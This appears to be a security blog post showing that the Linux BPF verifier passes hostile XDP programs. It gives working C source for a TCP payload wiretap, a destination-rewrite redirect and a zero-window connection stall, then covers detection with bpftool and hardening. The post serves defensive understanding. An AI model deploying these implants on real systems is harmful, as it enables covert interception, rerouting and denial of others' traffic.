Verified, Not Safe: XDP Programs the Kernel Trusts

005 · 2026-05-13 · the BPF verifier guarantees memory safety, not intent

I wrote an XDP program last week. Attached it to eth0, loaded it with bpf_prog_load. The verifier walked every path through the bytecode, checked my bounds, checked my helper calls, and returned 0. Clean load.

I ran bpftool prog list and there it was—sitting alongside systemd's cgroup programs and the container runtime's socket filters. One more entry in a list of twenty. If you scrolled past it, you'd assume it was a monitoring tool. Some observability thing. It wasn't. It was copying the first 128 bytes of every TCP payload into a ring buffer.

The verifier didn't flag it. It couldn't. The verifier's job is to prove my program won't crash the kernel. It doesn't have an opinion about what I do with packet data once I've proven I'll access it safely.

All of this requires CAP_BPF or root. An attacker with root can already load kernel modules, ptrace processes, rewrite binaries. But BPF is different in one way: it looks normal. A kernel module shows up in lsmod. A modified binary fails a hash check. A BPF program sits in a list of twenty other BPF programs and looks identical to the one next to it.

I wanted to understand where the line actually is.

Four programs the verifier loves

All four compile with clang -O2 -target bpf. All four load cleanly.

ETHERNETdst:mac

SRC IP10.0.1.1

DST IP10.0.1.100

DPORT4443

WINDOW14600

PAYLOADGET /api/secret..

Each program touches a different part of the same packet. Click to see which fields matter.

Silent drop

XDP runs before the kernel allocates an sk_buff. Return XDP_DROP for packets matching a destination port: no socket buffer, no netfilter hook, nothing for tcpdump to see. I sent traffic to port 4443 and watched tcpdump. Nothing. Not a SYN, not a RST. The only evidence was ethtool -S counters—the NIC saw the packets, the kernel didn't.

Passive wiretap

The drop program was visible in one way: the connection failed. The client knew something was wrong. So I tried the opposite—what if traffic flows normally and I just watch?

#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <arpa/inet.h>

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 1 << 20);  /* 1 MB */
} tap_rb SEC(".maps");

SEC("xdp")
int xdp_tap(struct xdp_md *ctx) {
    void *data     = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end)
        return XDP_PASS;
    if (eth->h_proto != htons(ETH_P_IP))
        return XDP_PASS;

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end)
        return XDP_PASS;
    if (ip->protocol != IPPROTO_TCP)
        return XDP_PASS;

    __u32 ip_hlen = ip->ihl * 4;
    struct tcphdr *tcp = (void *)ip + ip_hlen;
    if ((void *)(tcp + 1) > data_end)
        return XDP_PASS;

    __u32 tcp_hlen = tcp->doff * 4;
    void *payload = (void *)tcp + tcp_hlen;
    if (payload >= data_end)
        return XDP_PASS;

    __u32 tcp_hdr_off = (void *)tcp - data;
    __u32 pay_off = tcp_hdr_off + tcp_hlen;
    if (pay_off + 128 > (__u32)(data_end - data))
        return XDP_PASS;

    void *buf = bpf_ringbuf_reserve(&tap_rb, 128, 0);
    if (!buf)
        return XDP_PASS;

    bpf_xdp_load_bytes(ctx, pay_off, buf, 128);
    bpf_ringbuf_submit(buf, 0);

    return XDP_PASS;
}

This one returns XDP_PASS. Traffic flows normally. Nobody's connection breaks. But every TCP payload gets its first 128 bytes copied into a BPF_MAP_TYPE_RINGBUF before the kernel's network stack even touches it. A userspace process reads the ring buffer at its leisure.

I checked. ss didn't show it. lsof didn't show it. There's no file descriptor, no socket, no entry in /proc/net. The data path is entirely kernel-internal: XDP hook → ring buffer → mmap'd read. The only evidence is a map in bpftool map list that you'd have to think to look for.

Header rewrite

This is the one that surprised me. Not because it's complicated—because it's identical to legitimate infrastructure code.

I rewrote the destination IP, recomputed the checksum with the RFC 1624 incremental update, and called bpf_redirect to send the packet out a different interface.

#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <arpa/inet.h>

#define ORIG_DST  0x0A000164  /* 10.0.1.100 */
#define NEW_DST   0x0A000265  /* 10.0.2.101 */
#define OUT_IFIDX 4

static __always_inline void
update_csum(__u16 *csum, __be32 old_val, __be32 new_val) {
    __u32 s = (~(__u32)*csum & 0xFFFF)
           + (~((__u32)old_val >> 16) & 0xFFFF)
           + (~(__u32)old_val          & 0xFFFF)
           + ((__u32)new_val >> 16)
           + ((__u32)new_val & 0xFFFF);
    s = (s & 0xFFFF) + (s >> 16);
    s = (s & 0xFFFF) + (s >> 16);
    *csum = (__u16)~s;
}

SEC("xdp")
int xdp_redirect_rewrite(struct xdp_md *ctx) {
    void *data     = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end)
        return XDP_PASS;
    if (eth->h_proto != htons(ETH_P_IP))
        return XDP_PASS;

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end)
        return XDP_PASS;

    if (ip->daddr != htonl(ORIG_DST))
        return XDP_PASS;

    __be32 old_dst = ip->daddr;
    ip->daddr = htonl(NEW_DST);
    update_csum(&ip->check, old_dst, ip->daddr);

    return bpf_redirect(OUT_IFIDX, 0);
}

From the sender's side, everything looked normal. Packet left, ACK came back. From the original destination's side, the connection never happened. The packet showed up on a different interface, heading to a different host entirely.

If you diffed this against Cilium's XDP datapath or Facebook's Katran, the structure is the same. Parse headers, match a condition, rewrite an IP, update the checksum, redirect. The code that load-balances your production traffic and the code that silently reroutes it to an attacker's box use the same helpers, the same bounds checks, the same checksum fold. There is no syntactic tell.

TCP window zero

I didn't drop anything. I didn't redirect anything. I changed a single field: the TCP window size. Set it to zero on incoming ACKs from a target port. XDP runs on ingress—so when the server on port 8080 sends an ACK back, the XDP program rewrites its window field to zero before the local TCP stack reads it. The local application sees a zero window and enters persist mode per RFC 1122 §4.2.2.17, voluntarily stopping transmission. The connection stays open. No RST, no FIN. netstat shows ESTABLISHED. Everything looks healthy. The data just stops flowing.

#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <arpa/inet.h>

#define TARGET_PORT 8080

static __always_inline void
update_tcp_csum(__u16 *csum, __u16 old_val, __u16 new_val) {
    __u32 s = (~(__u32)*csum & 0xFFFF)
           + (~(__u32)old_val  & 0xFFFF)
           + (__u32)new_val;
    s = (s & 0xFFFF) + (s >> 16);
    *csum = ~((__u16)s + (__u16)(s >> 16));
}

SEC("xdp")
int xdp_zero_window(struct xdp_md *ctx) {
    void *data     = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end)
        return XDP_PASS;
    if (eth->h_proto != htons(ETH_P_IP))
        return XDP_PASS;

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end)
        return XDP_PASS;
    if (ip->protocol != IPPROTO_TCP)
        return XDP_PASS;

    struct tcphdr *tcp = (void *)ip + (ip->ihl * 4);
    if ((void *)(tcp + 1) > data_end)
        return XDP_PASS;

    if (tcp->source != htons(TARGET_PORT))
        return XDP_PASS;
    if (!tcp->ack)
        return XDP_PASS;

    __u16 old_win = tcp->window;
    tcp->window = 0;
    update_tcp_csum(&tcp->check, old_win, 0);

    return XDP_PASS;
}

The kernel's TCP stack doesn't know. XDP rewrote the incoming window field before the TCP code ever read it. The local side thinks the server's receive window is zero, so it stops sending. ss locally shows the send queue growing. Nobody dropped a packet. The connection is just frozen, waiting for a window update that arrives with the right value—but gets rewritten to zero again every time.

I sat there watching the send queue climb. A connection stall that's invisible to every standard diagnostic on both sides. No packet loss. No errors. Just a frozen pipe.

All four programs pass the verifier. All four are structurally identical to things you'd find in production—a load balancer rewrites headers, a firewall drops ports, a monitoring tool reads payloads, a traffic shaper adjusts windows. Same SEC("xdp"), same bounds checks, same helper calls. The only difference is what's on the other side of the ring buffer, or which IP address you're rewriting to, or why you picked that port number.

NIC

XDP

TCP stack

app

→ ringbuf

→ eth1

Same hook, same verifier, four different intents. Click a program to see what happens to the packet.

The haystack

After loading my wiretap program, I ran bpftool prog list to see what it looked like from the outside. I'd been testing on a Kubernetes node running Cilium, so there were already a lot of BPF programs loaded. This is what I saw:

$ bpftool prog list
6: cgroup_device  tag a0d4b9c1d1f9  gpl
    loaded_at 2026-05-12T08:31:02+0000  uid 0
    xlated 504B  jited 309B  memlock 4096B
11: cgroup_skb  tag 6deef7357e7b4530  gpl
    loaded_at 2026-05-12T08:31:02+0000  uid 0
    xlated 64B  jited 54B  memlock 4096B
12: cgroup_skb  tag 6deef7357e7b4530  gpl
    loaded_at 2026-05-12T08:31:02+0000  uid 0
    xlated 64B  jited 54B  memlock 4096B
58: cgroup_device  tag ee0e253c78993a24  gpl
    loaded_at 2026-05-12T08:31:14+0000  uid 0
    xlated 416B  jited 255B  memlock 4096B
173: xdp  tag 8f06c7a58c442bc7  gpl
    loaded_at 2026-05-12T08:32:01+0000  uid 0
    xlated 1392B  jited 788B  memlock 4096B
    map_ids 14,15
174: sched_cls  tag 3bc7abe41cce68c5  gpl
    loaded_at 2026-05-12T08:32:01+0000  uid 0
    xlated 17968B  jited 9728B  memlock 20480B
    map_ids 14,15,16,17
175: sched_cls  tag 9a5b24def40c6967  gpl
    loaded_at 2026-05-12T08:32:01+0000  uid 0
    xlated 22120B  jited 12043B  memlock 24576B
    map_ids 14,15,16,17,18
212: xdp  tag 5a3c0f0c4a3d7e9b  gpl
    loaded_at 2026-05-12T09:14:33+0000  uid 0
    xlated 864B  jited 492B  memlock 4096B
    map_ids 21
340: cgroup_skb  tag 6deef7357e7b4530  gpl
    loaded_at 2026-05-12T08:33:19+0000  uid 0
    xlated 64B  jited 54B  memlock 4096B
341: cgroup_skb  tag 6deef7357e7b4530  gpl
    loaded_at 2026-05-12T08:33:19+0000  uid 0
    xlated 64B  jited 54B  memlock 4096B
389: cgroup_device  tag a2b450ee44e80e5e  gpl
    loaded_at 2026-05-12T08:33:44+0000  uid 0
    xlated 504B  jited 309B  memlock 4096B
415: sched_cls  tag 7e21c72519aa452a  gpl
    loaded_at 2026-05-12T08:34:02+0000  uid 0
    xlated 4200B  jited 2311B  memlock 4096B
    map_ids 14,15,16
472: tracepoint  tag b0f0e9ea03d4acba  gpl
    loaded_at 2026-05-12T08:35:11+0000  uid 0
    xlated 1288B  jited 703B  memlock 4096B
    map_ids 29
511: xdp  tag e4f8c3a21d9b6f07  gpl
    loaded_at 2026-05-12T10:41:57+0000  uid 0
    xlated 712B  jited 401B  memlock 4096B
    map_ids 34

My wiretap is one of those entries. Which one?

14 programs loaded. click the implant.

All programs look the same from bpftool. Try to find the wiretap.

They all have the same fields: type, tag hash, bytecode size, map IDs. Nothing distinguishes the implant from the rest.

I tried bpftool net list—that at least shows which programs are attached to which interfaces:

$ bpftool net list
xdp:
eth0(2) driver id 173
veth7a3f(8) generic id 212
eth1(3) driver id 511

tc:
eth0(2) clsact/ingress bpf_lxc id 174 tag 3bc7abe41cce68c5
eth0(2) clsact/egress bpf_lxc id 175 tag 9a5b24def40c6967

Better. But legitimate XDP programs attach to interfaces too. Cilium's datapath is on eth0. A network policy enforcer lives on a veth. A traffic monitor sits on eth1. My wiretap is on one of these interfaces and it looks exactly like the others.

Reading the bytecode

The only real way to know what a program does is to read it. I dumped the bytecode of my wiretap. Click any instruction to see what it's doing:

click an instruction to annotate it.

Grey lines are standard parsing. Copper lines are the tells. How fast can you spot them in 27 instructions?

If you know what you're looking at, the tells are there. But I had to know to look for those patterns. And I wrote the program. If I were looking at someone else's bytecode—one of thirty programs on a production node, each with hundreds of instructions—would I spot the bpf_ringbuf_reserve buried in a flow that looks like a standard packet filter?

It gets worse. bpftool prog dump jited id 212 gives you the JIT'd native x86 instead of BPF bytecode. Now you're reading mov and call instructions with hex addresses. Even less readable.

Most teams never look at any of this. The programs load, traffic flows, dashboards stay green.

Hardening

So what do you actually do about this?

kernel.unprivileged_bpf_disabled=1—the baseline. Default since kernel 5.16. Only CAP_BPF or root can load programs. If you're running anything older, set it now. Doesn't solve the problem described above, but shrinks the surface.

BPF LSM hooks—this is the more interesting one. Linux 5.7+ lets you write BPF programs that gate other BPF programs. You attach a policy to the bpf LSM hook that checks program type, attach target, or the calling process before allowing bpf_prog_load. SELinux and AppArmor both have BPF policy support. So you can say "only Cilium's binary, signed by this key, can load XDP programs on eth0." Everything else gets rejected at load time.

Signed BPF programs—there's been work toward loading programs signed against a keyring, where the loader checks the signature before the verifier even runs. Not fully mainlined yet, but it's the direction things are heading.

Baseline diffing—the simplest approach, and probably the most underused. Snapshot what's loaded, compare periodically:

# snapshot loaded programs
bpftool prog list --json > /var/log/bpf-baseline.json

# snapshot interface attachments
bpftool net list --json >> /var/log/bpf-baseline.json

# diff against previous snapshot
diff <(jq -S . /var/log/bpf-baseline.json) \
     <(bpftool prog list --json | jq -S .)

Detection command	What it reveals
`bpftool prog list`	All loaded programs, type, size, maps
`bpftool net list`	XDP and TC attachments per interface
`bpftool prog dump xlated id N`	BPF bytecode disassembly
`bpftool prog dump jited id N`	Native x86/ARM assembly
`bpftool map list`	All maps—look for unexpected ringbufs
`sysctl kernel.unprivileged_bpf_disabled`	Whether unprivileged users can load BPF
`ausearch -k bpf`	Audit log of BPF syscalls (if auditing enabled)

None of these tell you what a program does. They tell you what's loaded. That gap—between knowing what's present and knowing what it's doing—is the whole problem.

Reading:

Guillaume Fournier — With Friends Like eBPF, Who Needs Enemies? (DEF CON 29, ebpfkit)
Brendan Gregg — BPF Performance Tools
Kernel docs — BPF LSM
bpftool(8) man page